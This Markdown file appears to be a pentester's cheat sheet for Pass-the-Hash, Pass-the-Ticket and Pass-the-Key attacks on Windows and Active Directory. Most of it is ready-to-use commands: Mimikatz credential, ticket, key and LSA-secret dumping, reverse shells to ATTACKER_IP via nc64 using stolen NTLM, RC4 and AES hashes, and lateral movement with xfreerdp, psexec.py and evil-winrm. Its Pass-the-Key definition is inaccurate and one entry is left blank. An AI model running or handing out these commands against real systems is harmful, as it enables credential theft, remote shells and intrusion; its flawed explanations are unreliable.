92 lines
3.6 KiB
Markdown
92 lines
3.6 KiB
Markdown
|
|
||
|
## General
|
||
|
|
||
|
Alternate Authentication with Pass-the-Hash (PtH), Pass-the-Ticket (PtT), and Pass-the-Key (PtK) are methods for authenticating to a system without providing a plaintext password.
|
||
|
|
||
|
Pass-the-Hash (PtH) is an attack technique that allows an attacker to use a stolen password hash to authenticate to a system, without needing to know the plaintext password. This can be done by capturing the NTLM or LM hash of a user's password, which is stored on a Windows system when the user logs in.
|
||
|
|
||
|
Pass-the-Ticket (PtT) is an attack technique that allows an attacker to use a stolen Kerberos ticket to authenticate to a system, without needing to know the plaintext password. This can be done by capturing the Kerberos ticket that is issued to a user when they log in, and then using it to authenticate to other systems on the network.
|
||
|
|
||
|
Pass-the-Key (PtK) is an attack technique that allows an attacker to use a stolen encryption key to decrypt sensitive data, without needing to know the plaintext password. This can be done by capturing the encryption key that is used to encrypt a user's data and then using it to decrypt the data. (Steal key encryption of tickets)
|
||
|
|
||
|
All these methods are used by attackers to gain unauthorized access to a system by bypassing normal authentication mechanisms.
|
||
|
|
||
|
PtH = Using the hash to connect
|
||
|
PtT = Using ticket to connect
|
||
|
PtK =
|
||
|
|
||
|
LOCAL VS ACTIVE DIRECTORY
|
||
|
While using tools such has mimikatz, you can gather local hash and active direcotry hash from users. Take note that mimikatz is not the only tool you can use to find hashes, tickets and keys
|
||
|
|
||
|
|
||
|
## Commands
|
||
|
|
||
|
To begin, one must acquire some hashes, tickets, or keys. This can be done using tools such as Mimikatz.
|
||
|
|
||
|
- Upload Mimikatz to the target System
|
||
|
|
||
|
## Alternate Authentication (PtH)
|
||
|
```
|
||
|
mimikatz # privilege::debug
|
||
|
mimikatz # token::elevate
|
||
|
|
||
|
# Local Users
|
||
|
lsadump::sam
|
||
|
|
||
|
# AD Users
|
||
|
sekurlsa::msv
|
||
|
|
||
|
#Setup Lisener (Attacking Machine)
|
||
|
nc -lvnp PORT
|
||
|
|
||
|
# Launch Reverse Shell (Using nc64 ont the other machine, you can use other technique to launch a reverse shell (Example smb/psexec in msfconsole))
|
||
|
sekurlsa::pth /user:USER /domain:DOMAIN /ntlm:NTLM_HASH /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP PORT"
|
||
|
```
|
||
|
- Other Technique to pass the hash
|
||
|
RDP --> xfreerdp /v:VICTIM_IP /u:DOMAIN\\MyUser /pth:NTLM_HASH
|
||
|
SMB --> psexec.py -hashes NTLM_HASH DOMAIN/MyUser@VICTIM_IP
|
||
|
WinRM -->evil-winrm -i VICTIM_IP -u MyUser -H NTLM_HASH
|
||
|
|
||
|
|
||
|
## Alternate Authentication (PtT)
|
||
|
```
|
||
|
mimikatz # privilege::debug
|
||
|
mimikatz # sekurlsa::tickets /export
|
||
|
|
||
|
# We can inject the tickets into the current session
|
||
|
kerberos::ptt [0;427fcd5]-2-0-40e10000-USER@MACHINE_DOMAIN (Change the tickets)
|
||
|
|
||
|
# Check the if you have the tiket permission
|
||
|
C:\> klist
|
||
|
```
|
||
|
|
||
|
|
||
|
## Alternate Authentication (PtK)
|
||
|
```
|
||
|
mimikatz # privilege::debug
|
||
|
mimikatz # sekurlsa::ekeys
|
||
|
|
||
|
#Setup Lisener (Attacking Machine)
|
||
|
nc -lvnp PORT
|
||
|
```
|
||
|
b54259bbff03af8d37a138c375e29254a2ca0649337cc4c73addcd696b4cdb65
|
||
|
**If we have the RC4 hash:**
|
||
|
```shell-session
|
||
|
mimikatz # sekurlsa::pth /user:USER /domain:DOMAIN /rc4:RC4_HASH /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP PORT"
|
||
|
```
|
||
|
|
||
|
**If we have the AES128 hash:**
|
||
|
```shell-session
|
||
|
mimikatz # sekurlsa::pth /user:USER /domain:DOMAIN /aes128:AES128_HASH /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP PORT"
|
||
|
```
|
||
|
|
||
|
**If we have the AES256 hash:**
|
||
|
```shell-session
|
||
|
mimikatz # sekurlsa::pth /user:USER /domain:DOMAIN /aes256:AES256_HASH /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP PORT"
|
||
|
```
|
||
|
|
||
|
## Dump LSAdump
|
||
|
```
|
||
|
mimikatz # token::elevate
|
||
|
mimikatz # lsadump::secrets
|
||
|
```
|